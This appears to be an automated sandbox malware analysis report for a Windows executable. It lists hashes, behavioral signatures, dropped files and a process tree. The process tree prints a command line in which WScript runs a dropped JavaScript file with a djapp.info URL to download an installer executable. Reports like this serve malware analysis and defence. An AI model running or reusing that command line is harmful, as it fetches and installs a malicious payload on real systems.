Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07/05/2024, 01:49
Static task
static1
Behavioral task
behavioral1
Sample
1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe
Resource
win10v2004-20240419-en
General
-
Target
1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe
-
Size
184KB
-
MD5
1f08dba1c294a753b71f99ad678916c5
-
SHA1
feb848a9f2d0259274d4b585def9437ac5972313
-
SHA256
9054054d38316e7d0026a71bbb55fdf023d2616deed4997b32900178b056f4f6
-
SHA512
ba6044796e764f1298978b08269616152ca6d1051a463e31fe51eaba47544a0c841786c930d149c6b06dfed1a9c80c45cf6e74a8f2ca85fbbe7dcad2745d3d42
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3C:/7BSH8zUB+nGESaaRvoB7FJNndnb
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 6 1956 WScript.exe 8 1956 WScript.exe 10 1956 WScript.exe 12 2424 WScript.exe 13 2424 WScript.exe 15 2792 WScript.exe 16 2792 WScript.exe 18 2588 WScript.exe 19 2588 WScript.exe 21 2264 WScript.exe 22 2264 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2192 wrote to memory of 1956 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 28 PID 2192 wrote to memory of 1956 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 28 PID 2192 wrote to memory of 1956 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 28 PID 2192 wrote to memory of 1956 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 28 PID 2192 wrote to memory of 2424 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 30 PID 2192 wrote to memory of 2424 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 30 PID 2192 wrote to memory of 2424 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 30 PID 2192 wrote to memory of 2424 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 30 PID 2192 wrote to memory of 2792 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 32 PID 2192 wrote to memory of 2792 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 32 PID 2192 wrote to memory of 2792 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 32 PID 2192 wrote to memory of 2792 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 32 PID 2192 wrote to memory of 2588 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 34 PID 2192 wrote to memory of 2588 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 34 PID 2192 wrote to memory of 2588 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 34 PID 2192 wrote to memory of 2588 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 34 PID 2192 wrote to memory of 2264 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 36 PID 2192 wrote to memory of 2264 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 36 PID 2192 wrote to memory of 2264 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 36 PID 2192 wrote to memory of 2264 2192 1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\1f08dba1c294a753b71f99ad678916c5_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf163F.js" http://www.djapp.info/?domain=pqzuVvGjFp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf163F.exe2⤵
- Blocklisted process makes network request
PID:1956
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf163F.js" http://www.djapp.info/?domain=pqzuVvGjFp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf163F.exe2⤵
- Blocklisted process makes network request
PID:2424
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf163F.js" http://www.djapp.info/?domain=pqzuVvGjFp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf163F.exe2⤵
- Blocklisted process makes network request
PID:2792
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf163F.js" http://www.djapp.info/?domain=pqzuVvGjFp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf163F.exe2⤵
- Blocklisted process makes network request
PID:2588
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf163F.js" http://www.djapp.info/?domain=pqzuVvGjFp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf163F.exe2⤵
- Blocklisted process makes network request
PID:2264
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5c89a9213a9715073115bb20adc2ea72e
SHA177cda38819260e781b37b99152d9512cbb898148
SHA2561b8ed0a156249541319deee72d844a5017a179ff7b29923452e61d60b453d3a3
SHA51286da9ebcf2f19e25d33d4700ed7b0fb713b8367449be8e0b0ed4b1f5eb8019f11d4952c4b750cb90cc5730d49cedb2034d5ea91c24d46fd3516ccd36a4212fd2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5a5721074b68463ce487a7978e4693d67
SHA1b32e1b7a6d5b06c4e59856454cfa2007b2be23cc
SHA25672efdb9acbd4b5fc2663e06479924644bde3b26f516bd0ad626d9e9189218530
SHA5128deb3026db8963cd595a04b7d561617ae8d28d33c204a97ed15bf60ea1449b62d987ad9138dae1895a98c2c8d66070aeeeb6cf84abc6aaf04ce2fb785ee530e3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD582e65debe4f840a3012fd634eb27fe54
SHA15d97b4645285d7a454e36d5b4a1e020f0820907c
SHA2568f8584d9b69cb9e1d193903d888da081445f868867659e50f889eccbe7b9c2e7
SHA512e7d7d33e281922e459d57aed15a0f5a4e5f3d586fdefc0e7f984651798d441081296d75183bd7dbc01c3686fb1ddd63bfbc4f456d1e9634eb03e9f80435878c7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD523ee6303a16e6884e8b6f7f2e53a912d
SHA18f828f58b2ddcd2c93cf3a9e3c1a5098e5d20d71
SHA2566a5e61ba0ed586597a0b868b8cc16e631c055047ba684e599a2c0780da3ea368
SHA5126b7fe2d6fbaed233fd6565856f31a78764472c0d2b77c38e830efa1fcd46fe11eea1ac315bd9fcf4de1f01a865c77f59af39fc6341843a1331d2a6443f1aa558
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm
Filesize6KB
MD5d15d5d41efc8c4dfa36fdb8eb09e7d68
SHA11708718d197935643816e79898a1d556d37e23f8
SHA256b77307eb0431b1d9e826dd8e6e0ae2daca31cf5e479d0b4cbfea36a1ec993fdf
SHA51230e91b9cfe423211bd175226893778430437a846e0c979d5bb84c4373123d1bdf2aa1ec2d87d37150da629563a577c2ecfdb135de60f8be8f6740451d080bbcf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\domain_profile[1].htm
Filesize40KB
MD559e12a065a6f7b5482e908d2ccdc5bd2
SHA1f433d8b8d9e4e6c486c6bd69f2b90f4770e0fc96
SHA2569ec8ccaf2ccb909e1f6198fd792ff35661b6e08695f6f1b9fb5fe8ecc9da837f
SHA512c8fd9a0e13a228955e4c5a832f8080f0fbbcbc34c91020eda7cb6e5b74a6526e62acf9c12777bf9aa14ac105d0736e99c23423292f2067ee31f70e0bea899af6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm
Filesize40KB
MD57c548d4a3008181349d9d00454d67a50
SHA10468178689849288a21d1065be958982b1e6d98b
SHA256f49f405214c43d9ceba430638e8f9345b488d043c3f01972aaa65a09829295b5
SHA51253bb9fede2bb2e22ed71984c91687c81687d628b005b79e1201fe72f3ed9dab41b0f0e8dea64b674e92b56a22e6d36e3965c73c93fe4c178ca021cf6178cabcc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\domain_profile[1].htm
Filesize6KB
MD56f6c627b5ec224ff92e70c082c88d1e1
SHA1d2f1fbb118efd3ce03f04dd4cdb55d68151efffd
SHA256c3361bf97185e949a701a08ee3411e3d701602734b5415e239ce729c508427d1
SHA5120227efaef1469f1a4371aa7acf96316bc32b5e7c88be833bc7cfb0b7017bc6d72dbd4eee03700c23b98a2aa1245fcae284e52daa1c37fd8c6fdb445429ae9476
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
177B
MD5026eaa51c74f7422247ae5ba4cfe0524
SHA12ec212e45a95a9eb25e5738117d697ead502a10e
SHA2561bd166fd97a0fcda4c785d5074a2ac3e61ab6aaeeb3d469b979524e1b792f607
SHA512b323ad2f00699e25686306089e2dd8fcba2b72ef92d90d7e816b0b399386e37d15b43ba22fd4cd9d832c983156c178dac123416c271160e5f1180ec6d03843da